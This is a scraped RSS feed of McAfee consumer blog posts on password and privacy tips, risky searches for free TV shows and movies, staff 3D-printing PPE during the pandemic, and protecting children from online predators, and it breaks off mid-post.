How To Strengthen Your Passwords

A secure password requires at least 14 characters and should include both upper and lower case letters, capitals, numbers, and symbols.

If your password consists of readily available public knowledge like your birthdate, street address, or your dog’s name, chances are it’s not very strong. Likewise, predictable sequences of numbers or letters, like 123456789 or abcdefg, are risky.

Should You Protect Yourself From Viruses?

You wouldn’t cross the street without looking both ways. Installing antivirus software is the virtual equivalent of double-checking on a busy street. Protect your computer’s health and safety with antivirus software that prevents attacks from malicious programs that can infect your computer and the computers of others.

The Antivirus Safety Net

Every time you access the internet, you risk infection from a vast array of malware, including trojan horses, worms, and spyware, to name just a few. Luckily, antivirus software has a firewall that can detect these intruders, while a recovery tool helps eliminate these malicious programs from your computer.

Both a firewall and a VPN can prevent unauthorized web access to your computer systems. McAfee offers both antivirus software that removes malware, spyware, and adware through scheduled scans and protects your computer in real-time with its VPN, Safe Connect.

Should You Update Your Software?

You’re likely already familiar with many of the best privacy practices. These include using secure passwords, rejecting unknown emails, ignoring suspicious-looking links, and never distributing your personal information. When you pair these practices with free updates to your security software, you’re in an excellent position to preserve your privacy on the web.

Software updates can rectify security issues, replace outdated features, enhance compatibility with your apps, and even increase running speed. These patches can protect your computer from viruses, and prevent spread to other systems.

How To Update

Ready to update? Simply click ‘yes’ when you get a popup from your software developer asking if you’d like the latest features.

Most manufacturers offer free updates, while others require a technical support contract. Each software manufacturers’ website should provide specific details to help you download their security updates.

What are Cookies? Should I remove them?

Removing cookies is really up to preference. Cookies allow a website you’ve visited to retain your information—like your email address and password—for a more convenient user experience. However, tracking cookies do pose a risk to your security. By allowing cookies, you’re saying it’s okay for the information to be sent to an unknown location.

Many cookies are relatively harmless and do nothing more than use your IP address for marketing analysis. Others, however, may submit your name and address to a tracking host, allowing advertisers to target you with bullseye-like precision.

Every browser has an option that lets you delete your cookies from your computer. For example, Internet Explorer shows a gear icon in the upper right-hand corner of the browser screen. You simply click on the gear, select “Internet Options” in the menu box, and then click “Delete browsing on exit.”

Connecting Securely Online

Yes, it is possible. When using an online browser, the Hypertext Transfer Protocol (HTTP) allows you to view webpages but doesn’t provide security. The lack of encryption enables third parties to easily intercept data that you may prefer to keep private. When you use Hypertext Transfer Protocol Secure (HTTPS), you enjoy secure transmissions. Not all websites support this function, but it can provide more web privacy when you visit sites that do.

Steps To Protect

So how can you use this information to keep your sensitive data from becoming vulnerable? Here are the main takeaways:
• Get a VPN. Secure your home and travel networks with VPN software. It makes blocking suspicious activity easy and can protect your computer from becoming damaged.
• Use a password manager. This is a great tool for creating and storing hard-to-break passwords. You can find free password managers online, coupled with antivirus software.
• Install antivirus and firewall software that doesn’t flag false detections.
• Accept free security updates from your software manufacturer.
• Remove cookies from your browser.
• Use HTTPS for encrypted security on sites that support it.

With a little security know-how and the right tools for the job, you’ll be well-equipped to protect even your most sensitive and valuable data. Don’t live in fear of hackers and malware. Let your software manufacturer be your safety net, and browse with peace of mind!

The post Internet Privacy: Tips & Tricks for Staying Secure Online appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/internet-privacy-tips-tricks-for-staying-secure-online/feed/ 1
Beware When You Search for These TV Shows and Movies https://www.mcafee.com/blogs/consumer/au-beware-when-you-search-for-these-tv-shows-and-movies/ https://www.mcafee.com/blogs/consumer/au-beware-when-you-search-for-these-tv-shows-and-movies/#comments Tue, 16 Jun 2020 04:04:50 +0000 /blogs/?p=101911

Beware When You Search for These TV Shows and Movies If you’ve been following recent stay-at-home orders, it’s likely that you’ve been scavenging the internet for new content to help pass the time. But having multiple streaming subscriptions can quickly add up. Consequentially, users who are hesitant to pay more for online streaming subscriptions Criminals […]

The post Beware When You Search for These TV Shows and Movies appeared first on McAfee Blogs.

]]>

Beware When You Search for These TV Shows and Movies

If you’ve been following recent stay-at-home orders, it’s likely that you’ve been scavenging the internet for new content to help pass the time.

But having multiple streaming subscriptions can quickly add up. Consequentially, users who are hesitant to pay more for online streaming subscriptions

Criminals are often behind these websites, luring unsuspecting users into schemes via “free” downloads of popular movies and TV shows. Some of these movies and shows are risker than others, however, as McAfee WebAdvisor data has revealed* certain titles are tied to potential malware and phishing threats.

Let’s take a look at the TV shows and movies that could lead you to a dangerous download instead of your next film spree, as well as discuss what users can do to stay secure.

 Top 10 Australian TV and Movie Titles

Top 10 Australian TV Titles With Risky Results With Risky Results
1.      Unorthadox Ace Ventura
2.      You Green Book
3.      Family Guy John Wick
4.      Big Mouth The Machinist
5.      Homeland Annihilation
6.      The Vampire Diaries Ex Machina
7.      Dynasty A Star Is Born
8.      Lost Fyre
9.      Brooklyn Nine-Nine Lady Macbeth
10.  Stranger Things Bird Box

 Stay Protected While Streaming

While consumers search for new content from home, criminals are clearly searching for ways to trick eager TV and movie fans. However, there’s still a way users can stay both entertained and secure during this time. Follow these tips to help ensure that your online entertainment experience is safe:

 Watch what you click

Users looking to catch up on Season 2 of “You” or watch the “The Incredibles” on repeat should be cautious and only access entertainment content directly from a reliable source. The safest thing to do is to subscribe to a streaming site that offers the content or download the movie from credible websites, instead of downloading a “free” version from a website that could contain malware.

 Refrain from using illegal streaming sites

Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do your device a favor and stream the show from a reputable source.

Use a comprehensive security Solution

Use a solution like McAfee Total Protection. This can help protect your devices from malware, phishing attacks, and other threats. It also includes McAfee WebAdvisor, which helps alert users of malicious websites. Additionally, McAfee WebAdvisor can be accessed as a free download.

Use parental control software

Kids are tech-savvy and may search for movies by themselves. Ensure that limits are set on your child’s device and use software that can help minimize exposure to potentially malicious or inappropriate websites.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

*Methodology: McAfee pulled the most popular TV and movie titles available on Australian streaming sites according to “best of” articles by a range of Australian publications. The web results for the searches of the entertainment titles with modifying terms, such as “TV show” and “torrent,” were then analyzed. Other popular modifying search terms include “free download,” “free login,” “free,” and “pirated download.” From there, the resulting URLs and domains were measured using McAfee WebAdvisor data and assigned a score of high, medium, or unverified risk. The results identified the top 10 TV shows and movie titles with the highest risk of being used by criminals to spread malware and phishing threats.

 

The post Beware When You Search for These TV Shows and Movies appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/au-beware-when-you-search-for-these-tv-shows-and-movies/feed/ 1
McAfee Team Members Give Back During Pandemic by 3D Printing PPE https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/mcafee-team-members-give-back-during-pandemic-by-3d-printing-ppe/ https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/mcafee-team-members-give-back-during-pandemic-by-3d-printing-ppe/#respond Mon, 15 Jun 2020 15:26:20 +0000 /blogs/?p=102007

Behind the scenes, McAfee secures critical information to protect what matters most. But a visible side of the company is making just as big of an impact by protecting essential workers during the pandemic. A small army of McAfee volunteers have joined the worldwide effort to protect doctors, hospital workers and other medical professionals by […]

The post McAfee Team Members Give Back During Pandemic by 3D Printing PPE appeared first on McAfee Blogs.

]]>

Behind the scenes, McAfee secures critical information to protect what matters most. But a visible side of the company is making just as big of an impact by protecting essential workers during the pandemic.

A small army of McAfee volunteers have joined the worldwide effort to protect doctors, hospital workers and other medical professionals by making personal protective equipment (PPE). Team members are spending their downtime creating masks, visors and plastic face shields on their 3D printing machines. PPE is being generously donated, with McAfee’s support, to healthcare workers and others on the front lines of COVID-19.

Through McAfee’s corporate social responsibility response to COVID-19, global team members who are part of the 3D mask printing program have produced nearly 5,000 pieces of PPE and have used 250 volunteer hours to make a difference in our communities. Several team members have gone above and beyond the call of duty.

Many McAfee team members have joined the initiative since Advanced Threat Researcher Thomas Roccia began giving back during COVID-19 by printing masks.

McAfee has embraced this charitable spirit and display of innovation by funding the plastic filament and other materials for team members who have the hardware to produce face masks and shields. Time spent producing PPE qualifies for the company’s Volunteer Time Off program, a benefit that encourages team members to give back to the cause of their choice.

Making PPE to Protect in the Pandemic

3D printing technology has advanced significantly in recent years. On a large scale, it’s reducing production costs, increasing supply chain efficiency and providing low-cost manufacturing for unique items. Small 3D printing systems are easy to come by and getting started requires only a few hundred dollars.

For the past couple of years, Thomas has dabbled in 3D printing technology to aid his research at McAfee by building prototypes for projects.  His machine also comes in handy for fixing things that get broken at his home in France.

Thomas began producing masks and shields in March 2020 as the pandemic gained traction and has since delivered more than 1,000 within his community. Steve, who heads the Advanced Threat Research group, was so moved that he and team members Sam and Kevin crafted a plan and joined the effort.

Steve reached out to at least a dozen medical facilities in the Portland area to gauge interest, and many were on board. The group settled on a local healthcare organization in fast need of 100 masks.

McAfee donated materials for the group and production began. Averaging about a dozen masks per day, the trio soon had nearly 50 masks ready to ship. Another half dozen went to a healthcare facility in San Diego at the request of a McAfee team member.

PPE was produced with an Ender 3 Printer using a Face Shield 3D Printer Design, transparent face shield material, elastic bands, a hole punch and scissors. Getting into production, however, was the hard part, Steve said.

“We ran into some significant challenges procuring materials,” he said. “But in the end, we were able to build a pretty high-quality mask at a low cost.”

The group continues to produce PPE based on the needs of healthcare providers.

Getting the Job Done for Everyone

Another McAfee team member, Moe comes from a family of health care providers. His dad is a doctor in Palestine and mother is a retired personal support worker.

Moe has seen firsthand the risk, care and compassion that healthcare workers put into their career, so he began making visors and ear pieces for providers on the front lines. In one weekend, he donated about 100 visors and a plethora of ear guards to Michael Garron Hospital in Toronto.

“While I may not be in the medical field myself, it does not mean I cannot practice my talent and hobby to help our healthcare workers and my fellow Canadians during this time of need,” Moe said.

Will, a program manager at McAfee and U.S. Army veteran, also fired up his 3D printer and began making plastic masks with filtered breathing holes to protect workers on the front lines. He has gladly traded some leisure time so he can contribute to this unified giving effort.

“I wanted to help, and I have the ability to make sure essential personnel is protected and staying safe by providing PPE to them for free,” he said. “We can’t do our jobs unless they can do theirs.”

 

 

 

 

 

 

 

At McAfee, we encourage and support the efforts of our team members to make a difference in their communities. If you’re interested in joining the McAfee team, explore our careers.

The post McAfee Team Members Give Back During Pandemic by 3D Printing PPE appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/mcafee-team-members-give-back-during-pandemic-by-3d-printing-ppe/feed/ 0
Beware When You Search for These TV Shows and Movies https://www.mcafee.com/blogs/consumer/india-beware-when-you-search-for-these-tv-shows-and-movies/ Sun, 14 Jun 2020 04:02:39 +0000 /blogs/?p=101898

Beware When You Search for These TV Shows and Movies If you’ve been following recent stay-at-home orders, it’s likely that you’ve been scavenging the internet for new content to help pass the time. But having multiple streaming subscriptions can quickly add up. Consequentially, users who are hesitant to pay more for online streaming subscriptions Criminals […]

The post Beware When You Search for These TV Shows and Movies appeared first on McAfee Blogs.

]]>

Beware When You Search for These TV Shows and Movies

If you’ve been following recent stay-at-home orders, it’s likely that you’ve been scavenging the internet for new content to help pass the time.

But having multiple streaming subscriptions can quickly add up. Consequentially, users who are hesitant to pay more for online streaming subscriptions

Criminals are often behind these websites, luring unsuspecting users into schemes via “free” downloads of popular movies and TV shows. Some of these movies and shows are risker than others, however, as McAfee WebAdvisor data has revealed* certain titles are tied to potential malware and phishing threats.

Let’s take a look at the TV shows and movies that could lead you to a dangerous download instead of your next film spree, as well as discuss what users can do to stay secure.

Top 10 Indian TV Titles With Risky Results With Risky Results
1.      Delhi Crime Mardaani 2
2.      Brooklyn Nine-Nine Zootopia
3.      Panchayat Jawaani Jaaneman
4.      Akoori Chapaak
5.      Fauda Love Aaj Kal
6.      Ghoul Inception
7.      Mindhunter Bahubali
8.      Narcos Rajnigandha
9.      Devlok Gully Boy
10.   Lost Bala

Stay Protected While Streaming

While consumers search for new content from home, criminals are clearly searching for ways to trick eager TV and movie fans. However, there’s still a way users can stay both entertained and secure during this time. Follow these tips to help ensure that your online entertainment experience is safe:

 Watch what you click

Users looking to catch up on Season 2 of “You” or watch the “The Incredibles” on repeat should be cautious and only access entertainment content directly from a reliable source. The safest thing to do is to subscribe to a streaming site that offers the content or download the movie from credible websites, instead of downloading a “free” version from a website that could contain malware.

 Refrain from using illegal streaming sites

Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do your device a favor and stream the show from a reputable source.

Use a comprehensive security Solution

Use a solution like McAfee Total Protection. This can help protect your devices from malware, phishing attacks, and other threats. It also includes McAfee WebAdvisor, which helps alert users of malicious websites. Additionally, McAfee WebAdvisor can be accessed as a free download.

Use parental control software

Kids are tech-savvy and may search for movies by themselves. Ensure that limits are set on your child’s device and use software that can help minimize exposure to potentially malicious or inappropriate websites.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

*Methodology: McAfee pulled the most popular TV and movie titles available on Asian streaming sites according to “best of” articles by a range of Asian publications. The web results for the searches of the entertainment titles with modifying terms, such as “TV show” and “torrent,” were then analyzed. Other popular modifying search terms include “free download,” “free login,” “free,” and “pirated download.” From there, the resulting URLs and domains were measured using McAfee WebAdvisor data and assigned a score of high, medium, or unverified risk. The results identified the top 10 TV shows and movie titles with the highest risk of being used by criminals to spread malware and phishing threats.

 

The post Beware When You Search for These TV Shows and Movies appeared first on McAfee Blogs.

]]>
Reports of Online Predators on the Rise. How to Keep Your Kids Safe.  https://www.mcafee.com/blogs/consumer/family-safety/reports-of-online-predator-on-the-rise-how-to-keep-your-kids-safe/ https://www.mcafee.com/blogs/consumer/family-safety/reports-of-online-predator-on-the-rise-how-to-keep-your-kids-safe/#respond Sat, 13 Jun 2020 16:00:30 +0000 /blogs/?p=101624 online predators

June is Internet Safety Month. And, with kids spending more time online, stepping up the public conversation about digital risks couldn’t come at a better time. The past few months have created what some experts call the perfect storm for online predators. Schools are closed, kids are on devices more, and social distancing is creating […]

The post Reports of Online Predators on the Rise. How to Keep Your Kids Safe.  appeared first on McAfee Blogs.

]]>
online predators

June is Internet Safety Month. And, with kids spending more time online, stepping up the public conversation about digital risks couldn’t come at a better time.

The past few months have created what some experts call the perfect storm for online predators. Schools are closed, kids are on devices more, and social distancing is creating new levels of isolation and boredom.

Guards are down, and predators know it. In fact, according to The National Center for Missing & Exploited Children (NCMEC), reports to their CyberTipline spiked 106% during the first months of the pandemic. A recent CNN story, claims the dark web has seen a similar increase in activity within predator communities that has spilled over to the mainstream web since the pandemic began.

While specific data doesn’t exist (yet) to connect increased complaints directly to the ongoing health crisis, NCMEC, the FBI, and UNICEF continue to issue strong warnings to parents to step up digital safety as predators step up their efforts to connect with kids online.

What You Should Know

online predators

Predators reach out to minors through social networks, gaming platforms, or apps. They often pose as a peer, use fake photos, and create fake profiles to lure minors to chat. Predators build trust with children through devious tactics such as grooming, mirroring, and fishing, which you can read more about in our post specific to predator behavior.

Predators have been known to (although not exclusively) target socially awkward or shy kids and convince them to keep the online relationship secret. The predator may ask for a risqué or explicit photo that they may later use to bully or manipulate the child or share within predator circles on the dark web. If the child refuses to send more photos when asked, a predator may threaten to share photos they already have with the child’s family and friends. Often the predator may ask the child to meet in person. These relationships can be brief or go on. Regardless of duration, each encounter can have a harmful psychological impact on a child. Of course, the worst-case predator situations can result in trafficking or death.

What You Can Do

No parent wants to think about their child in this chilling situation. However, a quick Google search regarding actual predator cases may likely inspire you to adopt targeted safety practices. Here are some focused things you can do to minimize your child’s exposure to predators.

  • Have frequent and honest conversations with your child about the specific ways predators may try to befriend them online.
  • Be a safe haven. Discuss with your kids why it’s important for them to tell you right away if they feel uncomfortable with a conversation or if they are asked to engage in any inappropriate activity online.
  • Review your child’s online profiles often. This includes the content they post, who they follow, and the “friends” who comment or message them.
  • Inventory social networks and apps to ensure privacy settings are set to the most restrictive levels possible.
  • Discuss the consequences of sharing inappropriate photos with anyone online.
  • Check-in with your child frequently throughout the day. If you work at home and get easily engrossed with work, consider setting a timer to remind you to monitor your child’s digital activity.
  • Ask simple, critical questions: What apps do your use? What are you watching? Who are you talking to?
  • Teach kids how to safely search the web using tools such as McAfee Web Advisor. Consider parental controls designed to block risky sites, filter inappropriate content, and help parents set screen limits. And, don’t be shy about physically checking your child home screen or PC several times a week.
  • Create screen limits and a phone curfew to prevent late-night online conversations.
  • Be aware of your isolating more or insisting on more privacy to talk with friends.
  • If your child is attending class online, don’t assume they are safe. Monitor their web surfing activity through browser history and monitoring. Connect with teachers to inquire about safety protocols.
  • Seek out help and report it if your child encounters a threatening situation online. You can also contact your local FBI field office.

There’s no way to avoid online risk 100%. Darker elements will always infiltrate the endless opportunity and good stuff the internet offers. As parents, rather than live in fear, we can be proactive. We can understand the risks, take action to minimize them, and make every effort to equip our kids to deal with any threats they encounter online.

The post Reports of Online Predators on the Rise. How to Keep Your Kids Safe.  appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/family-safety/reports-of-online-predator-on-the-rise-how-to-keep-your-kids-safe/feed/ 0
Beware When You Search for These TV Shows and Movies https://www.mcafee.com/blogs/consumer/au-beware-when-you-search-for-these-tv-shows-and-movies-2/ https://www.mcafee.com/blogs/consumer/au-beware-when-you-search-for-these-tv-shows-and-movies-2/#respond Sat, 13 Jun 2020 04:01:17 +0000 /blogs/?p=101895

Beware When You Search for These TV Shows and Movies If you’ve been following recent stay-at-home orders, it’s likely that you’ve been scavenging the internet for new content to help pass the time. But having multiple streaming subscriptions can quickly add up. Consequentially, users who are hesitant to pay more